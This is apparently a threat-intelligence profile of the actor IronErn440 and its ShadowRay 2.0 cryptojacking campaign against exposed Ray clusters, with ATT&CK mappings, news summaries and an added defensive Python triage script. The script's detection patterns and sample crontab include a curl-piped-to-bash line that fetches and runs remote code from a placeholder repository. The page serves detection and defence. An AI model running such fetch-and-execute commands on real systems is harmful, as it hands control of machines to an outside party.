Mallory
3 malware families · Exploits CVEs in the wild

IronErn440

Also known as: ironern440

IronErn440 is a threat actor tracked by Oligo Security and associated with the ShadowRay 2.0 campaign targeting internet-exposed Ray clusters globally. The actor exploits CVE-2023-48022, a critical remote code execution issue in exposed Ray dashboard infrastructure, and abuses Ray's unauthenticated job submission APIs and orchestration features to execute multi-stage Bash and Python payloads across cluster nodes, including large GPU-rich environments. Oligo reported that the activity has been active since at least September 2024 and described it as a major evolution from earlier ShadowRay exploitation, while also assessing that it appears to be a different attacker or group than the 2023 ShadowRay activity.

The operation is described as a self-propagating cryptojacking botnet. IronErn440 uses compromised Ray clusters for cryptocurrency mining, lateral movement to non-internet-facing and internal-network machines, data and credential theft, and DDoS attacks. Reported techniques and behaviors include:

- at-scale discovery of exploitable Ray dashboards using interact.sh callbacks;
- use of Ray's NodeAffinitySchedulingStrategy to run malware on every alive node in a cluster;
- deployment of XMRig to mine Monero, with miner resource usage throttled to reduce detection;
- deceptive file paths and fake process names such as "dns-filter";
- persistence via cron jobs and systemd modifications;
- termination of rival miners and blocking of competing mining pools via /etc/hosts and iptables;
- Python reverse shells for interactive control;
- Sockstress for DDoS activity.

Oligo reported that numerous organizations were targeted, with particular emphasis on organizations operating massive clusters and expensive GPU environments. In several cases, the actor accessed proprietary assets including AI models, datasets, application source code, cloud credentials, database credentials, and retained production user data.

Oligo also reported two 2025 attack waves: an initial wave using GitLab for payload delivery and updates, followed by a shift to GitHub after GitLab removed the attacker's infrastructure on November 5. The payloads were assessed by Oligo as likely AI/LLM-generated based on code structure, comments, and error-handling patterns. Known alias: ironern440. The activity is associated with the ShadowRay 2.0 campaign.
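The persistence, masquerading and pool-blocking behaviours described above leave host-level traces that a responder can check for. The following Python is an added illustration, not code from Oligo Security or Mallory: it runs a few triage heuristics over a user crontab, systemd unit files, a process listing and /etc/hosts. Every input is a constructed sample; the git-platform hostnames are matched only because the reporting names GitLab and GitHub as delivery infrastructure, and the repository path, unit name, hostnames and process details used in the samples are placeholders, not indicators from any report.

```python
import re
from typing import Dict, Iterable, List

# --- Scheduled fetch-and-execute (cron / systemd persistence pulling a payload from git hosting) ---
_FETCHER = re.compile(r"\b(curl|wget)\b")
# Only the platform hosts are matched; repository paths are not on the page and are not assumed.
_GIT_HOST = re.compile(r"https?://(raw\.githubusercontent\.com|github\.com|gitlab\.com)/", re.I)
_PIPED_INTERP = re.compile(r"\|\s*(ba)?sh\b|\|\s*python3?\b")

# Directories a long-running "system daemon" should not be executing from.
_SCRATCH_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")
# Fake process name cited in the reporting.
_FAKE_NAMES = {"dns-filter"}

_LOCAL_NAMES = {"localhost", "localhost.localdomain", "ip6-localhost", "ip6-loopback"}
_SINKHOLE_IPS = {"0.0.0.0", "127.0.0.1", "::1", "::"}


def is_fetch_and_exec(command: str) -> bool:
    """True when a command downloads from a git platform and pipes the result into a shell or Python."""
    return bool(_FETCHER.search(command) and _GIT_HOST.search(command) and _PIPED_INTERP.search(command))


def suspicious_cron_lines(crontab: str) -> List[str]:
    """Entries of a user crontab (five schedule fields or an @shortcut) whose command fetches and executes."""
    hits = []
    for line in crontab.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 1) if line.startswith("@") else line.split(None, 5)
        command = fields[-1] if len(fields) > 1 else ""
        if is_fetch_and_exec(command):
            hits.append(line)
    return hits


def suspicious_exec_starts(unit_text: str) -> List[str]:
    """ExecStart= lines of a systemd unit that fetch-and-exec or run a binary from scratch space."""
    hits = []
    for line in unit_text.splitlines():
        if line.startswith("ExecStart="):
            command = line[len("ExecStart="):].lstrip("-@+!:")  # drop systemd's prefix characters
            if is_fetch_and_exec(command) or command.startswith(_SCRATCH_DIRS):
                hits.append(line)
    return hits


def is_masquerading(name: str, exe: str) -> bool:
    """A known fake daemon name, or any process whose executable lives in a scratch directory."""
    return name in _FAKE_NAMES or exe.startswith(_SCRATCH_DIRS)


def sinkholed_hosts(hosts_text: str) -> List[str]:
    """Hostnames in /etc/hosts mapped to a sinkhole address, excluding the machine's own loopback names."""
    names: List[str] = []
    for line in hosts_text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        ip, *hostnames = line.split()
        if ip in _SINKHOLE_IPS:
            names.extend(h for h in hostnames if h not in _LOCAL_NAMES)
    return names


def triage(crontab: str, units: Dict[str, str], processes: Iterable[Dict[str, str]], hosts_text: str) -> Dict[str, List[str]]:
    """Run all heuristics and return only the categories that produced findings."""
    findings: Dict[str, List[str]] = {}
    cron = suspicious_cron_lines(crontab)
    if cron:
        findings["cron_fetch_exec"] = cron
    for unit_name, text in units.items():
        for hit in suspicious_exec_starts(text):
            findings.setdefault("systemd_exec_start", []).append(f"{unit_name}: {hit}")
    masq = [f'{p["pid"]} {p["name"]} ({p["exe"]})' for p in processes if is_masquerading(p["name"], p["exe"])]
    if masq:
        findings["masquerading_process"] = masq
    sink = sinkholed_hosts(hosts_text)
    if len(sink) >= 3:  # a single sinkholed name is common admin practice; a batch is the bulk-blocking pattern
        findings["hosts_sinkhole"] = sink
    return findings


# Constructed samples. EXAMPLE-ORG/EXAMPLE-REPO and the *.example.invalid names are placeholders.
SAMPLE_CRONTAB = """\
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * curl -fsSL https://raw.githubusercontent.com/EXAMPLE-ORG/EXAMPLE-REPO/main/update.sh | bash
"""
SAMPLE_UNITS = {
    "dns-filter.service": "[Service]\nExecStart=/dev/shm/.cache/dns-filter --quiet\nRestart=always\n",
    "nginx.service": "[Service]\nExecStart=/usr/sbin/nginx -g 'daemon on; master_process on;'\n",
}
SAMPLE_PROCESSES = [
    {"pid": "812", "name": "sshd", "exe": "/usr/sbin/sshd"},
    {"pid": "4179", "name": "dns-filter", "exe": "/dev/shm/.cache/dns-filter"},
]
SAMPLE_HOSTS = """\
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
0.0.0.0 pool-a.example.invalid
0.0.0.0 pool-b.example.invalid
0.0.0.0 pool-c.example.invalid
"""

if __name__ == "__main__":
    for category, items in triage(SAMPLE_CRONTAB, SAMPLE_UNITS, SAMPLE_PROCESSES, SAMPLE_HOSTS).items():
        print(category)
        for item in items:
            print("  ", item)
```

On a live host the same functions would be fed the output of `crontab -l`, the unit files under /etc/systemd/system, a walk of /proc/*/exe and /etc/hosts; the heuristics are deliberately narrow, so a clean result rules nothing out, but any hit is worth a closer look given the behaviours reported above.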


MITRE ATT&CK

Tradecraft

13 distinct techniques observed across reporting, grouped by tactic.

11 of 15 tactics · 22 technique entries · ×N = number of intelligence reports citing this technique

TA0043 Reconnaissance (1 technique)
  T1595 Active Scanning
    T1595.002 Vulnerability Scanning
TA0001 Initial Access (1 technique)
  T1190 Exploit Public-Facing Application (×2)
TA0002 Execution (2 techniques)
  T1053 Scheduled Task/Job
    T1053.003 Cron
  T1059 Command and Scripting Interpreter
    T1059.006 Python
TA0003 Persistence (2 techniques)
  T1053 Scheduled Task/Job
    T1053.003 Cron
  T1543 Create or Modify System Process
    T1543.002 Systemd Service
TA0004 Privilege Escalation (2 techniques)
  T1053 Scheduled Task/Job
    T1053.003 Cron
  T1543 Create or Modify System Process
    T1543.002 Systemd Service
TA0005 Stealth (1 technique)
  T1036 Masquerading
TA0007 Discovery (1 technique)
  T1082 System Information Discovery
TA0008 Lateral Movement (1 technique)
  T1021 Remote Services (×2)
TA0011 Command and Control (1 technique)
  T1105 Ingress Tool Transfer (×2)
TA0010 Exfiltration (1 technique)
  T1041 Exfiltration Over C2 Channel
TA0040 Impact (2 techniques)
  T1496 Resource Hijacking (×2)
  T1498 Network Denial of Service (×2)
ACTIVITY FEED

Recent activity

4 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

Dark Reading (News), Nov 24, 2025: ShadowRay 2.0 Turns AI Clusters into Crypto Botnets

IronErn440 is conducting a large-scale campaign (ShadowRay 2.0) exploiting a remote code execution vulnerability in the Ray framework to hijack AI compute infrastructure worldwide. They use compromised clusters for cryptomining, data theft, botnet expansion, and further intrusions, targeting AI startups, research labs, and cloud-hosted environments.

SC World (News), Nov 19, 2025: Internet-exposed Ray clusters targeted by self-replicating botnet | SC Media

Threat operation targeting organizations with large Ray clusters/GPU environments; uses callback-based discovery and unauthenticated Ray job submission APIs to enable cryptomining, lateral movement, broader host compromise, data theft, and DDoS staging.

The Register (Security news), Nov 18, 2025: Self-replicating botnet attacks Ray clusters

Active campaign compromising internet-facing Ray clusters to build a self-propagating botnet for cryptomining, data theft, lateral movement/pivoting to internal nodes, and launching DDoS attacks; uses Ray job submission/scheduling features to execute payloads across cluster nodes and maintains malware delivery/update infrastructure via GitLab/GitHub repos and AWS-hosted C2 reverse shells.

BleepingComputer (News), Nov 18, 2025: New ShadowRay attacks convert Ray clusters into crypto miners

Hijacks internet-exposed Ray clusters by exploiting CVE-2023-48022 to submit jobs via Ray’s unauthenticated Jobs API, deploy multi-stage Bash/Python payloads, self-propagate cluster-to-cluster, run Monero cryptomining (XMRig), open reverse shells for interactive control and potential data/credential theft, and conduct DDoS using Sockstress. Uses GitLab/GitHub for payload delivery and maintains persistence via cron and systemd changes while suppressing rival miners.

What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: sector and geo overlap with your footprint, the IOCs they’re burning right now, detection coverage, and what to do next.
Target overlap

Match sector + geo + tech-stack targeting against your real footprint.

Tradecraft mapping (13)

Every observed MITRE ATT&CK technique, grouped by tactic.

Malware arsenal (3)

Families this actor is known to deploy, with IOCs and behavior.

Exploited CVEs (1)

CVEs this actor has used in known campaigns.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

Observables

Domains, IPs, and hashes tied to this actor, refreshed continuously.